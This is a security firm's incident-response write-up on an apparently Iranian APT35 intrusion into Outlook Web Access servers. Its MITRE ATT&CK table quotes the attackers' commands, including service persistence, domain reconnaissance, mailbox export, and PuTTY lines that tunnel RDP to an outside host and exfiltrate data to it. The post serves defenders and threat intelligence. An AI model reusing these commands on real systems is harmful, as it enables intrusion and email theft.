Charming Kitten, also known as APT35, is a state-sponsored Iranian cyber-espionage group that is widely believed to operate on behalf of the Islamic Revolutionary Guard Corps (IRGC). [1] They focus on long-term operations targeting the US, Middle Eastern military, and organisations in engineering, business services and other sectors.
When Nerium was called to respond remotely to an incident in the Middle East, it became clear that the organisation had been compromised for months. Cybercriminals had been operating under the radar, siphoning off valuable email data undetected, and if it hadn’t been discovered by chance, the breach might still have been active. Through thorough analysis, we identified the attack as linked to Charming Kitten, also known as APT35, APT42, Mint Sandstorm, and Nexus Group.
Covert operations
Using Cyclops malware and web shells while meticulously erasing their tracks and adapting their methods, the adversaries had covertly embedded themselves into the organisation’s systems. Our investigation revealed compelling evidence from IP addresses, custom (Go-based) malware, domains, observed Tactics, Techniques, and Procedures (TTPs), and detailed activity pattern analysis. Additionally, we noticed that all adversary activity over a six-month period occurred exclusively during Islamic business hours, with a notable silence on Fridays - a traditional day of rest in many Muslim countries. Taken together, this evidence allowed us to confidently attribute the attack to state-sponsored actors, with the Iranian government as the likely culprit.
All but charming
APT35 has carved out a reputation for targeting military, diplomatic, and government personnel, particularly in the U.S. and the Middle East. Their reach extends beyond these sectors, infiltrating media, energy, defence, engineering, business services, telecommunications, and, possibly also, US elections. [1] And while the name might be charming, the tactics employed by Iranian-sponsored adversaries are anything but.
Cyclops malware
In this case, the attackers sought to maintain permanent access by planting custom webshells on the organisation’s Outlook Web Access (OWA) servers. These webshells allowed them to remotely control the servers, run commands, and access sensitive files. Attempts were also made to install Cyclops malware, but those efforts failed. Written in Go, this newly discovered malware platform — likely developed as a successor to BellaCiao [2] — allows its operators to execute arbitrary commands on the target’s file system and pivot within the infected network.
Classic con blunder
For over half a year, the attackers achieved operational success by exfiltrating a significant amount of email data — and they might have still been harvesting it if they hadn’t let their guard down. After securing the stolen data, the adversary became overconfident and careless. A classic con blunder that ultimately resulted in their discovery. In their attempt to access additional servers, they triggered multiple alarms in Defender, which was promptly picked up by the security monitoring team.
Rapid and proactive response
When Nerium was called in, our incident response expertise in identifying and neutralising advanced threats was crucial. Our rapid and proactive response not only mitigated the immediate danger but also succeeded in removing the attackers from the digital environment and making it more difficult for them to infiltrate again. With the client’s system recording screen activity, including that of the adversary, we were offered a rare insight into the attackers' operations, allowing us to pinpoint their methods with high precision.
Investigating the incident was essential, as understanding what had occurred is key to preventing future breaches. Through our analysis, we obtained critical intelligence on Charming Kitten's techniques, including their use of malicious PowerShell scripts to export email data, the command-line version of PuTTY for data exfiltration, and Cyclops malware to maintain persistence within the compromised systems.
Securing the strike zone
We developed specific detection rules and Indicators of Compromise (IoCs) to help identify similar threats in the future, including YARA rules to detect the presence of webshells and Cyclops malware. To counter the threats posed by Charming Kitten, we offered strategic advice on damage containment, recommending the isolation of affected systems to prevent a game of whack-a-mole with the adversaries. Knowing that cybercriminals often re-establish access through alternate backdoors the moment one is removed, we waited to isolate the attack until we were confident that all backdoors had been identified. This approach ensured that if the attackers attempted to regain access, we would quickly detect any new activity within the IT infrastructure we were investigating, ultimately preventing further breaches.
Sharing is winning
Building on years of experience in incident response, we successfully contained this threat. But we wouldn’t have been able to catch this Iranian cat without the collaboration of our colleagues and fellow professionals. At Nerium, we believe in the power of shared knowledge to strengthen our defences and enhance our responses to emerging threats. That’s why, paying it forward, we have distilled the lessons learned from this incident into actionable steps that other organisations can take to safeguard their IT environments. By openly sharing our findings, including Tactics, Techniques, and Procedures (TTPs), we aim to empower others with the tools needed to recognise and respond to similar threats. Cybersecurity is a collective effort - a game only won by working together.
This MITRE ATT&CK table offers insights into the TTPs employed by APT35, enabling the wider threat intelligence community to counter attacks by recognising behavioural patterns. We urge incident response and security teams to apply these insights to detect and respond effectively to APT35.
| TACTIC | ID | Name | Description |
|---|---|---|---|
| Persistence | T1505.003 | Server Software Component: Web Shell |
Adversary placed webshells in: - D:\Program Files\ClientAccess\Owa\auth\m.aspx - C:\inetpub\wwwroot\aspnet_client\system_web\4_0_30319\config.aspx 
|
| Credential Access, Defense Evasion, Persistence | T556.006 | Modify Authentication Process: Multi-Factor Authentication | Adversary disabled the ‘SafenetAgent for Outlook Web App’ used for Multi Factor Authentication of OWA. |
| Defense Evasion | T1070.003 | Indicator Removal: Clear Command History | The adversary removed browser history surgically directly after visiting websites such as easyupload.io and 7-zip.org. |
| Command and Control | T1573.002 | Encrypted Channel: Asymmetric Cryptography |
Adversary used Cyclops malware to establish a command & control channel.
Malware renamed from ‘Cyclops.exe’ to ‘ExchangeBackup.exe’ and was placed in: - C:/Users/Public/AppData/Local/Microsoft/Windows 
|
| Persistence | T1543.003 | Create or Modify System Process: Windows Service |
The Cyclops malware was made persistent by creating a Windows service using the command: - sc.exe create ExchangeBackup binpath= “C:\Users\Public\AppData\Local\Microsoft\Windows\ExchangeBackup.exe” 
|
| Command and Control | T1105 | Ingress tool transfer | Cyclops malware was downloaded from easyupload.io to the compromised server as well as from their own public servers.
|
| Discovery | T1033 | System Owner/User Discovery |
The following commands were launched to identify information about the users that have the domain admin privileges: - cmd /c net group "domain admins" /domain >c:\windows\temp\safe\log.txt 2>&1 Identifying the information about Remote Desktop user sessions was done via the command: - cmd /c quser >c:\windows\temp\safe\log.txt 2>&1 |
| Discovery | T1069.002 | Permission Groups Discovery: Domain Groups | The domain controller computers were queried: - cmd /c net group "domain controllers" /domain >c:\windows\temp\safe\log.txt 2>&1 |
| Discovery | T1016 | System Network Configuration Discovery | Current DNS settings were queried: - cmd /c ipconfig /displaydns >c:\windows\temp\safe\log.txt 2>&1 |
| Execution | T1059.001 | Command and Scripting Interpreter: PowerShell | A PowerShell script was launched to gather e-mail data. - cmd /c powershell -exec bypass -file <ObfuscatedPath>\ExchCheck.ps1 2>&1 |
| Collection | T1114.001 | Email Collection: Local Email Collection | Collecting pst files using the above PowerShell script that launched the following cmdlets: - Get-Mailbox - Get-MailboxExportRequest - Remove-MailboxExportRequest - New-MailboxExportRequest |
| Discovery | T1033 | System Owner/User Discovery |
The following command was launched by the adversary to obtain information about the currently running user: - cmd /c whoami /all >c:\windows\temp\safe\log.txt 2>&1 |
| Discovery | T1016 | System Network Configuration Discovery | This shows all information about the current network adapter: - cmd /c ipconfig /all >c:\windows\temp\safe\log.txt 2>&1 |
| Discovery | T1087.001 | Account Discovery: Local Account | Lists all the local users on the local device: - cmd /c net user >c:\windows\temp\safe\log.txt 2>&1 |
| Command and Control | T1572 | Protocol Tunneling |
The adversary tunnelled the remote desktop protocol over ssh via the commandline version of Putty: - cmd /c echo Y| mscsc.exe autoupdate.uk -P 443 -C -R 127.0.0.1:40455:127.0.0.1:3389 -l sita -pw *@123! >c:\windows\temp\safe_321\log.txt 2>&1 |
| Discovery | T1082 | System Information Discovery |
Querying system info: - cmd /c systeminfo >c:\windows\temp\log.txt 2>&1 Getting the disk letter, size, and the free space: - cmd /c wmic logicaldisk get name >c:\windows\temp\log.txt 2>&1 - cmd /c wmic logicaldisk get size >c:\windows\temp\log.txt 2>&1 - cmd /c wmic logicaldisk get freespace >c:\windows\temp\cts.txt 2>&1 |
| Collection | T1560.001 | Archive Collected Data: Archive via Utility |
The adversary compressed data using the following command using 7zip: - cmd /c <obfuscatedpath>\SenseCE7.exe a -t7z -y -mhe=on -m0=lzma -mx=9 -mfb=64 -md=32m -ms=on -p********** -v200m tmp.7z \logs > <obfuscated>\07.txt 2>&1 |
| Exfiltration | T1048.002 | Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol |
The adversary exfiltrated data using the command line version of Putty: - cmd /c echo y| SenseCE.exe -P 443 -pw <obfuscated>@123! -r " \tmp" aftelecom@autoupdate.uk: > <obfuscated>\00.txt 2>&1 |
Detection & mitigation
To support our fellow cyber security experts in hunting and identifying adversary activities discussed in this blog, we offer detection rules in the form of KQL queries for use in Defender. Additionally, we provide YARA rules to identify custom webshells on web servers and detect possible Cyclops malware running in memory.
KQL queries
Yara rules
Network-based indicators
Host-based indicators
[1] https://www.mandiant.com/sites/default/files/2022-09/apt42-report-mandiant.pdf
[2] https://harfanglab.io/insidethelab/cyclops-replacement-bellaciao/
